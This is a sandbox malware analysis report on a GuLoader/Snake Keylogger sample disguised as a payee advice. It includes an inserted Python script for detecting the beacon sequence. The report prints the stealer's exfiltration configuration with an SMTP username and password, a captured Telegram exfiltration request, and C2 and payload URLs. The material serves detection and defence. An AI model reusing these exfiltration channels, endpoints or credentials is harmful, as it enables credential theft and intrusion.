Windows Analysis Report
PayeeAdvice_HK54912_R0038704_37504.exe

Overview

General Information

Sample name: PayeeAdvice_HK54912_R0038704_37504.exe
Analysis ID: 1556938
MD5: a7071c7cf3999b13607413c36e8d5418
SHA1: a4d955d14cfb368d93bc7083214b01dec4c90f2b
SHA256: 4cdbe754de2114be5f9ccf7e3f3d4f9f7f8fadc279e860bb1773aee0e2de4047
Tags: exe, user-abuse_ch

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration (Snake Keylogger): {"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000000.00000002.2666489951.000000000839D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 5620 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |
Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

Sigma rule match: Source: Network Connection | Author: frack113 | Data: DestinationIp: 37.27.123.72, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe, Initiated: true, ProcessId: 6256, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 51084
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-16T16:51:18.035886+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 51068 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:20.955066+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 51072 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:22.783425+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 51074 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:24.205191+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 51076 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:25.870768+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 51078 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:28.771956+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 51082 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-16T16:51:16.029541+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 51066 | 158.101.44.242 | 80 | TCP
2024-11-16T16:51:17.326339+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 51066 | 158.101.44.242 | 80 | TCP
2024-11-16T16:51:18.732541+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 51069 | 158.101.44.242 | 80 | TCP

            AV Detection

Source: PayeeAdvice_HK54912_R0038704_37504.exe | Avira: detected
Source: 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
Source: PayeeAdvice_HK54912_R0038704_37504.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A7787A8 CryptUnprotectData | 4_2_3A7787A8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A778EF1 CryptUnprotectData | 4_2_3A778EF1
Source: PayeeAdvice_HK54912_R0038704_37504.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:51067 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:51083 version: TLS 1.2
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_00405772 CloseHandle, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose | 0_2_00405772
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_0040622D FindFirstFileW, FindClose | 0_2_0040622D
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_00402770 FindFirstFileW | 0_2_00402770
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_00402770 FindFirstFileW | 4_2_00402770
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_00405772 CloseHandle, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose | 4_2_00405772
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_0040622D FindFirstFileW, FindClose | 4_2_0040622D

            Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.5:51084 -> 37.27.123.72:587
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:51066 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:51069 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51076 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51074 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51068 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51082 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51072 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51078 -> 188.114.97.3:443
Source: global traffic | TCP traffic: 192.168.2.5:51084 -> 37.27.123.72:587
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:51067 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: api.onedrive.com
            Source: global trafficDNS traffic detected: DNS query: fa3hwa.dm.files.1drv.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: mail.foodex.com.pk
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 16 Nov 2024 15:51:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
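The request lines above are the beacon sequence that the Snake Keylogger signatures in this report rest on: an external-IP lookup against checkip.dyndns.org with a hard-coded MSIE 6.0 User-Agent, a geolocation query to reallyfreegeoip.org for the IP that came back, then a Telegram Bot API sendMessage call whose text carries the host name, a timestamp and the country. Two caveats for anyone building detections from this run: the captured Telegram request has an empty bot token and an empty chat_id, and the only response listed is a 404 with a 55-byte JSON body, which is consistent with the Telegram channel failing here (an inference from the listed lines, not something the report states); the TCP connection to port 587 together with the mail.foodex.com.pk lookup points at SMTP submission as the other exfiltration channel to watch. The script below is an added example, not code from the report or from Joe Sandbox. It parses request summaries in the shape shown above (the " | " field separator, the sample lines and the stage names are assumptions of this example), decodes the percent-encoded Telegram text, and checks that the three stages occurred in order.

```python
"""Reconstruct the Snake Keylogger beacon chain from HTTP request summaries.

Added example, not code from the report or from Joe Sandbox. The request
summaries below are constructed from the requests listed in the report; the
" | " field separator and the stage names are assumptions of this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Hard-coded User-Agent seen on every checkip.dyndns.org request in the report.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"

# Percent-encoded text parameter of the captured sendMessage call.
TELEGRAM_TEXT = (
    "%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/"
    "%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20"
    "Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20"
    "the%20system%20storage's%20empty.%20%5D"
)

# Constructed sample: one request per entry, request line then headers.
SAMPLE_REQUESTS = [
    f"GET / HTTP/1.1 | User-Agent: {LEGACY_UA} | Host: checkip.dyndns.org | Connection: Keep-Alive",
    "GET /xml/173.254.250.69 HTTP/1.1 | Host: reallyfreegeoip.org",
    f"GET /bot/sendMessage?chat_id=&text={TELEGRAM_TEXT} HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive",
    # Unrelated request (constructed control) that must not be classified.
    "GET /index.html HTTP/1.1 | User-Agent: Mozilla/5.0 | Host: www.example.com",
]


def parse_request(line):
    """Split 'METHOD target HTTP/x | Header: value | ...' into its parts."""
    parts = [p.strip() for p in line.split(" | ")]
    method, target, _version = parts[0].split(" ", 2)
    headers = {}
    for header in parts[1:]:
        name, _, value = header.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(method, target, headers):
    """Return (stage, details) for one request, or (None, {}) if unrelated."""
    host = headers.get("host", "").lower()
    url = urlsplit(target)
    if method == "GET" and host == "checkip.dyndns.org" and headers.get("user-agent") == LEGACY_UA:
        return "external_ip_lookup", {}
    geo = re.fullmatch(r"/xml/(\d{1,3}(?:\.\d{1,3}){3})", url.path)
    if host == "reallyfreegeoip.org" and geo:
        return "geolocation", {"ip": geo.group(1)}
    tg = re.fullmatch(r"/bot([^/]*)/sendMessage", url.path)
    if host == "api.telegram.org" and tg:
        # parse_qs percent-decodes values; keep blanks so an empty chat_id stays visible.
        query = parse_qs(url.query, keep_blank_values=True)
        token = tg.group(1)
        chat_id = query.get("chat_id", [""])[0]
        text = query.get("text", [""])[0]
        fields = {}
        for row in text.split("\r\n"):
            m = re.fullmatch(r"([A-Za-z ]+):\s*(.*)", row)
            if m:
                fields[m.group(1)] = m.group(2)
        return "telegram_exfil", {
            "bot_token": token,
            "chat_id": chat_id,
            "fields": fields,
            # Without a token and chat_id the API cannot deliver the message,
            # which is consistent with the 404 JSON response listed in the report.
            "empty_credentials": not token or not chat_id,
        }
    return None, {}


def analyze(lines):
    """Classify every request and check that the full beacon chain appeared in order."""
    stages = []
    for line in lines:
        stage, details = classify(*parse_request(line))
        if stage:
            stages.append({"stage": stage, **details})
    order = [s["stage"] for s in stages]
    expected = ["external_ip_lookup", "geolocation", "telegram_exfil"]
    first = [order.index(name) if name in order else -1 for name in expected]
    chain_complete = all(i >= 0 for i in first) and first == sorted(first)
    return {"stages": stages, "chain_complete": chain_complete}


if __name__ == "__main__":
    result = analyze(SAMPLE_REQUESTS)
    for stage in result["stages"]:
        print(stage)
    print("beacon chain complete:", result["chain_complete"])
```

The User-Agent match is deliberately exact: the string is a fixed literal inside the stealer rather than a browser default, so a looser match (for example on "MSIE 6.0" alone) would pull in legacy scanners and embedded devices.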
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037605000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3352963551.0000000039D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/0
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037628000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://foodex.com.pk
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037605000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037628000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.foodex.com.pk
Source: PayeeAdvice_HK54912_R0038704_37504.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328960805.00000000089E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.oned
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.onedrive.com/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.onedrive.com/v1.0/shares/s
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20a
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003764A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003763A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037645000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783144437.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fa3hwa.dm.files.1drv.com/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fa3hwa.dm.files.1drv.com/WE
